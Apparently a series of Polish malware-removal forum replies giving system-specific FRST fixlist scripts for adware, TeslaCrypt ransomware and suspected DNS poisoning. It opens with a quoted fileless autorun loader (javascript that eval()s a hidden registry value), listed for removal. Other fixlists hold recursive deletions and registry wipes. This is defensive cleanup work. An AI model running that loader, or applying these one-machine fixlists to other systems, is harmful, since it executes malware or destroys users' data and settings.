javascript:G3iLfTTMP="mppdrsA";P8y5=new%20ActiveXObject("WScript.Shell");Aiisa5nr="v1uz";KfWA0=P8y5.RegRead("HKCU\\software\\c7b41d5991\\8c2cffaf");l1h6NRpTB="3Uxja";eval(KfWA0);drxeHD7oz="NmifA (dane wartości zawierają 5 znaków więcej). HKU\Bajor\...\Run: [KB00528468] => C:\Users\Bajor\AppData\Local\Temp\KB00528468.exe HKU\Bajor\...\Run: [KB00088717] => C:\Users\Bajor\AppData\Local\Temp\KB00088717.exe [461312 2015-12-14] (SeriousBit) HKU\Bajor\...\Policies\Explorer: [TaskbarNoNotification] 1 HKU\Bajor\...\Policies\Explorer: [HideSCAHealth] 1 GroupPolicy: Ograniczenia - Chrome GroupPolicy-x32: Ograniczenia - Chrome DisableService: sptd C:\user.js C:\ProgramData\*.* C:\Users\Bajor\AppData\Roaming\NUF3$F@UHT.sys C:\Windows\System32\Drivers\ae0a43e686b1a0d.sys RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\CureIt Quarantine RemoveDirectory: C:\MyFolderakis RemoveDirectory: C:\Program Files\shopperz100920151159 RemoveDirectory: C:\Program Files (x86)\globalUpdate RemoveDirectory: C:\Program Files (x86)\VLC Player GPU+ RemoveDirectory: C:\ProgramData\{2B1568C5-2EDF-4213-9BC1-552E927F9F2C} RemoveDirectory: C:\ProgramData\17261655467602863622 RemoveDirectory: C:\ProgramData\FWdsManProF RemoveDirectory: C:\ProgramData\BWdsManProB RemoveDirectory: C:\ProgramData\eWdsManProe RemoveDirectory: C:\ProgramData\1WdsManPro1 RemoveDirectory: C:\ProgramData\DWdsManProD RemoveDirectory: C:\ProgramData\6WdsManPro6 RemoveDirectory: C:\ProgramData\lWdsManProl RemoveDirectory: C:\ProgramData\4WdsManPro4 RemoveDirectory: C:\ProgramData\7WdsManPro7 RemoveDirectory: C:\ProgramData\pWdsManProp RemoveDirectory: C:\ProgramData\rWdsManPror RemoveDirectory: C:\ProgramData\UWdsManProU RemoveDirectory: C:\ProgramData\WWdsManProW RemoveDirectory: C:\ProgramData\yWdsManProy RemoveDirectory: C:\ProgramData\Doctor Web RemoveDirectory: C:\ProgramData\McAfee RemoveDirectory: C:\ProgramData\TEMP RemoveDirectory: C:\ProgramData\Symantec RemoveDirectory: C:\ProgramData\NortonInstaller RemoveDirectory: C:\ProgramData\Norton RemoveDirectory: C:\Users\Bajor\AppData\Local\7224C90A-1445176699-DF11-905B-88AE1DE8E95F RemoveDirectory: C:\Users\Bajor\AppData\Local\7224C90A-1445170721-DF11-905B-88AE1DE8E95F RemoveDirectory: C:\Users\Bajor\AppData\Local\7224C90A-1445161706-DF11-905B-88AE1DE8E95F RemoveDirectory: C:\Users\Bajor\AppData\Local\Crsoft RemoveDirectory: C:\Users\Bajor\AppData\Local\gamesdesktop RemoveDirectory: C:\Users\Bajor\AppData\Local\globalUpdate RemoveDirectory: C:\Users\Bajor\AppData\Local\gmsd_pl_005010117 RemoveDirectory: C:\Users\Bajor\AppData\Local\gmsd_pl_005010102 RemoveDirectory: C:\Users\Bajor\AppData\Local\gmsd_pl_005010099 RemoveDirectory: C:\Users\Bajor\AppData\Local\gmsd_pl_005010095 RemoveDirectory: C:\Users\Bajor\AppData\Local\gmsd_pl_005010093 RemoveDirectory: C:\Users\Bajor\AppData\Local\gmsd_pl_005010089 RemoveDirectory: C:\Users\Bajor\AppData\Local\Idfsoft RemoveDirectory: C:\Users\Bajor\AppData\Local\MyBrowser RemoveDirectory: C:\Users\Bajor\AppData\Local\Norman Malware Cleaner RemoveDirectory: C:\Users\Bajor\AppData\Local\Ofics RemoveDirectory: C:\Users\Bajor\AppData\Local\SmartWeb RemoveDirectory: C:\Users\Bajor\AppData\Local\Temp RemoveDirectory: C:\Users\Bajor\AppData\Local\Tempfolder RemoveDirectory: C:\Users\Bajor\AppData\Local\TrafficSpaceLLC RemoveDirectory: C:\Users\Bajor\AppData\Local\WorldofTanks RemoveDirectory: C:\Users\Bajor\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} RemoveDirectory: C:\Users\Bajor\AppData\LocalLow\Company RemoveDirectory: C:\Users\Bajor\AppData\LocalLow\Temp RemoveDirectory: C:\Users\Bajor\AppData\Roaming\288896fb9 RemoveDirectory: C:\Users\Bajor\AppData\Roaming\7224C90A-1434178811-DF11-905B-88AE1DE8E95F RemoveDirectory: C:\Users\Bajor\AppData\Roaming\AnyProtectEx RemoveDirectory: C:\Users\Bajor\AppData\Roaming\ChromeUpdServeis RemoveDirectory: C:\Users\Bajor\AppData\Roaming\d3dx32gt RemoveDirectory: C:\Users\Bajor\AppData\Roaming\dd167b2d8 RemoveDirectory: C:\Users\Bajor\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9 RemoveDirectory: C:\Users\Bajor\AppData\Roaming\GoldenGate RemoveDirectory: C:\Users\Bajor\AppData\Roaming\istartsurf RemoveDirectory: C:\Users\Bajor\AppData\Roaming\mgyun RemoveDirectory: C:\Users\Bajor\AppData\Roaming\mystartsearch RemoveDirectory: C:\Users\Bajor\AppData\Roaming\NetService RemoveDirectory: C:\Users\Bajor\AppData\Roaming\ortmp RemoveDirectory: C:\Users\Bajor\AppData\Roaming\RunDir RemoveDirectory: C:\Users\Bajor\AppData\Roaming\shortCutStore RemoveDirectory: C:\Users\Bajor\AppData\Roaming\systweak RemoveDirectory: C:\Users\Bajor\AppData\Roaming\Thinstall RemoveDirectory: C:\Users\Bajor\AppData\Roaming\WorldofTanks RemoveDirectory: C:\Users\Bajor\Doctor Web RemoveDirectory: C:\Users\Bajor\DoctorWeb RemoveDirectory: C:\Users\Default\AppData\Roaming\Macromedia RemoveDirectory: C:\Users\Public\Documents\Baidu RemoveDirectory: C:\Windows\Installer\{B5AA6B37-C109-21AF-9EDE-37287EB853E1} CMD: attrib -r -h -s C:\*_*_FILES* /s CMD: attrib -r -h -s C:\how_recover* /s CMD: attrib -r -h -s D:\*_*_FILES* /s CMD: attrib -r -h -s D:\how_recover* /s CMD: attrib -r -h -s E:\*_*_FILES* /s CMD: attrib -r -h -s E:\how_recover* /s CMD: attrib -r -h -s H:\*_*_FILES* /s CMD: attrib -r -h -s H:\how_recover* /s CMD: attrib -r -h -s I:\*_*_FILES* /s CMD: attrib -r -h -s I:\how_recover* /s CMD: del /q /s C:\*_*_FILES* CMD: del /q /s C:\how_recover* CMD: del /q /s D:\*_*_FILES* CMD: del /q /s D:\how_recover* CMD: del /q /s E:\*_*_FILES* CMD: del /q /s E:\how_recover* CMD: del /q /s H:\*_*_FILES* CMD: del /q /s H:\how_recover* CMD: del /q /s I:\*_*_FILES* CMD: del /q /s I:\how_recover* Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. On będzie potężny ze względu na rekursywne usuwanie z wszystkich dysków plików typu how_to* i podobnych, nie wejdzie w załączniki forum. Shostuj go gdzieś i podaj link do pliku. 2. Sprawdź czy da się uruchomić Windows. Jeśli tak, to zrób raporty FRST i GMER spod Windows.

Usunięcie nie będzie mieć żadnego wpływu na kondycję, ale jeśli chcesz koniecznie usuwać odpadkowe wpisy, to: 1. Odinstaluj odpadek po deinstalacji IOBit, tzn. Surfing Protection, oraz archaiczny EVEREST Home Edition v2.20 (sterownik z roku 2005!). 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S2 LiveUpdateSvc; C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe [2934048 2015-11-22] (IObit) S3 anvsnddrv; system32\drivers\anvsnddrv.sys [X] Task: {2BD05BA6-988D-4BD3-A9CD-9A39F80AF524} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> Brak pliku Task: {45B57F63-4CFA-4024-9F36-FF9AA5D6A357} - System32\Tasks\Auslogics\BoostSpeed\Start BoostSpeed оn Piotr logon => C:\Program Files\Auslogics\BoostSpeed\BoostSpeed.exe Task: {5B184694-64C3-4633-94C5-945B3FA561D6} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> Brak pliku Task: {91DA43E3-C34D-41F2-97A3-27F005F81D05} - System32\Tasks\{52A3B9AF-C3F9-41E0-9BCD-EAD9F8138A73} => C:\.~BT\Sources\setupprep.exe Task: {94C89A2C-E6CA-4572-96D9-36B0BCDAC7C9} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> Brak pliku Task: {9F54B95F-5096-4803-AE61-E9B3AC5B616D} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> Brak pliku Task: {A1951BA5-DBB4-4CE3-B873-1D9C4A055828} - System32\Tasks\{2F43CCE1-0C52-4F6B-A28B-903359DD8F1C} => C:\.~BT\Sources\setupprep.exe Task: {B7499660-50E0-4979-9CF7-5B270C883C79} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> Brak pliku Task: {D21F6024-191F-4454-BBBC-09A650DA2549} - \Microsoft\Windows\Application Experience\AitAgent -> Brak pliku Task: {DAF6A54E-D4CF-4A30-A3A3-E8D8F8DF96A4} - System32\Tasks\Driver Booster SkipUAC (Piotr) => C:\Program Files\IObit\Driver Booster\DriverBooster.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp220141126 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-2399471354-2781755390-4139130681-1000\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp220141126 BHO: Brak nazwy -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> Brak pliku CHR HKU\S-1-5-21-2399471354-2781755390-4139130681-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Program Files\IObit RemoveDirectory: C:\Program Files\Opera RemoveDirectory: C:\Program Files\Common Files\IObit RemoveDirectory: C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98} RemoveDirectory: C:\ProgramData\IObit RemoveDirectory: C:\ProgramData\ProductData RemoveDirectory: C:\ProgramData\TEMP RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AntispamSniper for TheBat! RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Books Downloader RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TwonkyMedia RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\URUSoft RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VobSub RemoveDirectory: C:\Users\Piotr\AppData\LocalLow\IObit RemoveDirectory: C:\Users\Piotr\AppData\Roaming\Apple Computer RemoveDirectory: C:\Users\Piotr\AppData\Roaming\IObit RemoveDirectory: C:\Users\Piotr\AppData\Roaming\ProductData RemoveDirectory: C:\Windows\Tasks\ImCleanDisabled C:\Users\Piotr\AppData\Local\{*} C:\Users\Piotr\AppData\Roaming\*.* C:\Users\Piotr\AppData\Roaming\Microsoft\Office\Niedawny\doktorek.LNK C:\Users\Piotr\Desktop\pjhi — skrót.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, gdyż zablokuje FRST. FRST nie może też działać w piaskownicy. Uruchom FRST i kliknij w Napraw (Fix). Gdy Fix ukończy pracę, nastąpi restart. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

Wszystko wykonane i problem zasadniczy rozwiązany. Kolejny etap: Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Omyłkowo wstawiłam katalog C:\ProgramData\Kaspersky Lab do usunięcia, ale na szczęście aktywny Kaspersky to zablokował i nic się z katalogiem nie stało. A reszta Fixa wykonana. I ja tu raczej nic więcej nie wymyślę. Są oznaki infekcji sieciowej DNS dziedziczonej przez inne komputery tej sieci. Czyli problemem może być któreś urządzenie na trasie rozdzielania / serwer ("zatruwanie DNS"). Nie ma tu szczegółowych danych na temat konfiguracji serwera i urządzeń.

Podaj raport z FRST zrobiony z poziomu środowiska zewnętrznego: KLIK. Pliki o rozszerzeniu *.vvv to jest najnowsza wersja TeslaCrypt: KLIK. Plików nie da się odkodować żadnymi domowymi metodami ręcznymi. Jedyna opcja to uiszczenie opłaty przestępcom lub ewentualnie supportowi Kasperskiego: KLIK. Wymagany bezpośredni kontakt z supportem Kasperskiego, nie ma dostępnej publicznie żadnej wersji dekodera. W temacie do którego zlinkowałam nastąpiło bardzo dziwne zjawisko, tzn. użytkownik próbował negocjować z przestępcami wielkość opłaty, z niewiadomych przyczyn i bez wyjaśnień dali mu klucz ... za darmo. To jedyny przypadek tego typu jaki znam.

Te znaczniki są dlatego, że zadania są bezplikowe. FRST flaguje puste zadania niezależnie od tego jaki to typ (poprawny lub szkodliwy). To wszystko to prawdopodobnie jest wynik nieudanego podejścia z aktualizacją do wyższego systemu: Task: {2BD05BA6-988D-4BD3-A9CD-9A39F80AF524} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> Brak pliku Task: {5B184694-64C3-4633-94C5-945B3FA561D6} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> Brak pliku Task: {91DA43E3-C34D-41F2-97A3-27F005F81D05} - System32\Tasks\{52A3B9AF-C3F9-41E0-9BCD-EAD9F8138A73} => C:\.~BT\Sources\setupprep.exe Task: {94C89A2C-E6CA-4572-96D9-36B0BCDAC7C9} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> Brak pliku Task: {9F54B95F-5096-4803-AE61-E9B3AC5B616D} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> Brak pliku Task: {A1951BA5-DBB4-4CE3-B873-1D9C4A055828} - System32\Tasks\{2F43CCE1-0C52-4F6B-A28B-903359DD8F1C} => C:\.~BT\Sources\setupprep.exe Task: {B7499660-50E0-4979-9CF7-5B270C883C79} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> Brak pliku Task: {D21F6024-191F-4454-BBBC-09A650DA2549} - \Microsoft\Windows\Application Experience\AitAgent -> Brak pliku Najlepiej całkowicie odinstalować na czas aktualizacji. I jak mówię, ja tu nie widzę żadnych oznak infekcji.

Poprawki: 1. Nie ma żadnych oznak wykonania tej akcji, nadal adware w Firefox: 2. Otwórz Notatnik i wklej w nim: S1 wfdrvr_vt_1_10_0_28; system32\drivers\wfdrvr_vt_1_10_0_28.sys [X] DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched RemoveDirectory: C:\FRST\Quarantine RemobeDirectory: C:\MATS CMD: del /q C:\Users\L540\Downloads\MicrosoftFixit.ProgramInstallUninstall.RNP.Run*.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. 3. Prawdopodobnie trzeba będzie przeinstalować aplikację DisplayLink Core Software, gdyż w raporcie widać to co poniżej. Usuń te zerobajtowe pliki ręcznie przed reinstalacją aplikacji. Niektóre zerobajtowe pliki/foldery: ========================== C:\Windows\SysWOW64\dlumd10.dll C:\Windows\SysWOW64\dlumd11.dll C:\Windows\SysWOW64\dlumd9.dll C:\Windows\System32\dlumd10.dll C:\Windows\System32\dlumd11.dll C:\Windows\System32\dlumd9.dll

Wszystko zrobione, ale jeszcze na wszelki wypadek: Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

RafalM To jest błąd związany z połączeniami do serwerów. Microsoft na ten temat: KLIK. Gdyby nie to, że Kaspersky został tu jakoby odinstalowany, to jego firewall byłby w obszarze podejrzeń. Na wszelki wypadek dodaj nowe raporty FRST (włącznie z Addition), również pod kątem tego zdarzenia:

Specjalizowane narzędzia do skanowania USB (MCShield, USBFix) są linkowane w przyklejonym: KLIK. Poza nimi, nadaje się dowolny antywirus. PS. Ad "miły/miła" = jestem kobietą.

Jest tu więsza ilość problemów, tzn. także aktywne adware WordFly. Działania do przeprowadzenia: 1. Deinstalacje: - Odinstaluj: Adobe AIR (starsza wersja), Java 8 Update 25 (starsza wersja), REACHit (program Lenovo, ale przypuszczalnie to była wymuszona instalacja), WordFly 1.10.0.28 (adware). - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpisy Google Update Helper, Metric Collection SDK, Metric Collection SDK 35 > Dalej. Narzędzie nie umożliwia akcji hurtowej i trzeba je uruchomić tyle razy, ile wpisów podanych do usunięcia. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: ShortcutWithArgument: C:\Users\L540\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z ShortcutWithArgument: C:\Users\L540\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z ShortcutWithArgument: C:\Users\L540\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yoursites123.com/?type=hp&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.yoursites123.com/web/?type=ds&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.yoursites123.com/web/?type=ds&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z&q={searchTerms} HKU\S-1-5-21-1193470678-4225433021-8771545-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.yoursites123.com/web/?type=ds&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z&q={searchTerms} HKU\S-1-5-21-1193470678-4225433021-8771545-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yoursites123.com/?type=hp&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z HKU\S-1-5-21-1193470678-4225433021-8771545-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z HKU\S-1-5-21-1193470678-4225433021-8771545-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.yoursites123.com/web/?type=ds&ts=1449648802&z=a654d2aff3fcc58eb06d74dgdz2zbt8q3zfbemdtfm&from=ient07021&uid=SamsungXSSDX840XEVOX250GB_S1DBNSBF724649Z&q={searchTerms} FF HKLM-x32\...\Firefox\Extensions: [defsearchp@gmail.com] - C:\Users\L540\AppData\Roaming\Mozilla\Firefox\Profiles\87cb1dy5.default\extensions\defsearchp@gmail.com => nie znaleziono FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\L540\AppData\Roaming\Mozilla\Firefox\Profiles\87cb1dy5.default\extensions\deskCutv2@gmail.com => nie znaleziono FF HKLM-x32\...\Firefox\Extensions: [default_newtabff@gmail.com] - C:\Users\L540\AppData\Roaming\Mozilla\Firefox\Profiles\87cb1dy5.default\extensions\default_newtabff@gmail.com FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\L540\AppData\Roaming\Mozilla\Firefox\Profiles\87cb1dy5.default\extensions\yahooprotected@gmail.com Task: {1EC7A49C-D5AF-471F-8302-4989414BE893} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo) Task: {B492AC55-FB80-4659-BC4A-63322F8EF5CD} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2013-04-26] (Lenovo) Task: {EECE3A5B-7F98-4ACA-BDF4-D06721A965DE} - System32\Tasks\{601CD9E2-C7A2-45FE-B17D-A7E38B41B659} => pcalua.exe -a C:\Users\L540\Downloads\irfanview_plugins_438_setup_[www.programosy.pl].exe -d C:\Users\L540\Downloads DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKLM\SOFTWARE\Wow6432Node\FFPluginHp DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\hdcode DeleteKey: HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\TSv DeleteKey: HKLM\SOFTWARE\Wow6432Node\WdsManPro DeleteKey: HKLM\SOFTWARE\Wow6432Node\yoursites123Software DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WdsManPro DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Program Files (x86)\Google RemoveDirectory: C:\Program Files (x86)\Opera RemoveDirectory: C:\Program Files (x86)\SFK RemoveDirectory: C:\ProgramData\7WMiniPro7 RemoveDirectory: C:\ProgramData\pWdMp RemoveDirectory: C:\ProgramData\ZWdMZ RemoveDirectory: C:\Users\L540\AppData\Local\Google RemoveDirectory: C:\Users\L540\AppData\Local\Opera Software RemoveDirectory: C:\Users\L540\AppData\Roaming\istartsurf RemoveDirectory: C:\Users\L540\AppData\Roaming\Opera Software RemoveDirectory: C:\Users\L540\AppData\Roaming\TSv C:\ProgramData\{*}.* C:\Users\L540\AppData\Local\{72B6D539-A88B-49FA-899D-7191A00806A1} C:\Users\L540\Desktop\Mazda\Outlook 2007.lnk C:\Users\L540\Desktop\Szkolenie serwisowe 2012\Microsoft Office Outlook 2007.lnk C:\Windows\SysWOW64\pl.html EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Pliki autoexec.bat i config.sys nie są istotne, zresztą na mojej Vista są identyczne sumy kontrolne MD5. Omijamy te pliki. Natomiast do naprawy wszystkie wystąpienia pliku aelupsvc.dll.mui: 1. Przesyłam plik: KLIK. Plik umieść w folderze E:\FRST. 2. Do Notatnika wklej: Replace: E:\FRST\aelupsvc.dll.mui C:\Windows\System32\pl-PL\aelupsvc.dll.mui Replace: E:\FRST\aelupsvc.dll.mui C:\Windows\winsxs\x86_microsoft-windows-a..structure.resources_31bf3856ad364e35_6.0.6000.16386_pl-pl_f539d28b07e02b53\aelupsvc.dll.mui Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Nie mam danych na temat konfiguracji i zabezpieczeń sieci, więc trudno mi powiedzieć o co chodzi. Ale tu na pewno są objawy infekcji DNS. Gdyby nie to, że jest więcej niż jeden komputer zachowujący się w ten sposób, obstawiałabym cache lokalnego komputera (bufor DNS oraz cache przeglądarki). Ostatecznie mógłbyś spróbować na tym komputerze czy coś pomoże właśnie przeczyszczenie tych miesc (przy okazji pozostałe drobne korekty, w tym usunięcie szczątków po odinstalowanym FF): Otwórz Notatnik i wklej w nim: CloseProcesses: S3 catchme; \??\C:\ComboFix\catchme.sys [X] S2 DgiVecp; System32\Drivers\DgiVecp.sys [X] S3 GDPkIcpt; \??\C:\Windows\system32\drivers\PktIcpt.sys [X] S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X] HKLM\...\Run: [VIAxHCUtl] => C:\VIA_XHCI\usb3Monitor.exe HKLM-x32\...\Run: [] => [X] HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-460053187-810554011-2524304945-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-460053187-810554011-2524304945-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch Toolbar: HKU\S-1-5-21-460053187-810554011-2524304945-1001 -> Brak nazwy - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - Brak pliku DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\ProgramData\Kaspersky Lab RemoveDirectory: C:\Users\User\AppData\Local\Mozilla RemoveDirectory: C:\Users\User\AppData\Roaming\Mozilla RemoveDirectory: C:\Qoobox RemoveDirectory: C:\zoek RemoveDirectory: C:\zoek_backup CMD: del /q "C:\Users\Nauczyciel\AppData\Roaming\Microsoft\Word\SPR304865601799611001\SPR.docx.lnk" CMD: ipconfig 